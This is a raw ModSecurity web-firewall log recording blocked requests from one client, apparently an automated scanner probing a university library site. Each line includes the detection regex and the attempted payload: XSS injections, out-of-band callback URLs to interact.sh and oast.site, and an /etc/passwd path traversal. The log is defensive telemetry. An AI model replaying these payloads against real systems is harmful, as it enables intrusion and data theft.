"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAnd3BkAAAAI"]
[Tue Aug 29 11:51:51.651247 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnIlk0AAAAV"]
[Tue Aug 29 11:51:53.892025 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAjdQX8AAAAZ"]
[Tue Aug 29 11:51:53.893220 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAnIllUAAAAV"]
[Tue Aug 29 11:51:54.602227 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15asCo-f0AAAm80RYAAAAF"]
[Tue Aug 29 11:51:55.832490 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnepQcAAAAK"]
[Tue Aug 29 11:51:56.591714 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnn1-AAAAAe"]
[Tue Aug 29 11:51:57.606634 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAmIbTkAAAAo"]
[Tue Aug 29 11:51:58.696917 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAm80R8AAAAF"]
[Tue Aug 29 11:51:59.558475 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAm@51YAAAAH"]
[Tue Aug 29 11:51:59.591317 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAnh6OgAAAAS"]
[Tue Aug 29 11:52:01.566331 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAm@51wAAAAH"]
[Tue Aug 29 11:52:02.712875 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAm@52AAAAAH"]
[Tue Aug 29 11:52:02.773166 2023] [:error] [pid 2559] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAn-wvYAAAAB"]
[Tue Aug 29 11:52:02.780721 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAm@52EAAAAH"]
[Tue Aug 29 11:52:02.847268 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAn40ygAAAAW"]
[Tue Aug 29 11:52:04.743504 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnn2AIAAAAe"]
[Tue Aug 29 11:52:04.933315 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ukpc5mo6g3cei.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0ukpc5mo6g3cei.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAnd3DwAAAAI"]
[Tue Aug 29 11:52:05.537529 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnn2AYAAAAe"]
[Tue Aug 29 11:52:06.609641 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAhoHTwAAAAl"]
[Tue Aug 29 11:52:06.631429 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAnn2AsAAAAe"]
[Tue Aug 29 11:52:08.544313 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAn0GawAAAAa"]
[Tue Aug 29 11:52:08.640478 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAnd3EsAAAAI"]
[Tue Aug 29 11:52:09.608434 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAoAku0AAAAC"]
[Tue Aug 29 11:52:09.660471 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAnd3E8AAAAI"]
[Tue Aug 29 11:52:10.678958 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAnn2A8AAAAe"]
[Tue Aug 29 11:52:11.676304 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAm7nGgAAAAE"]
[Tue Aug 29 11:52:11.708377 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAlUlp0AAAA0"]
[Tue Aug 29 11:52:12.619676 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnTlMsAAAAA"]
[Tue Aug 29 11:52:13.557723 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAjdQa0AAAAZ"]
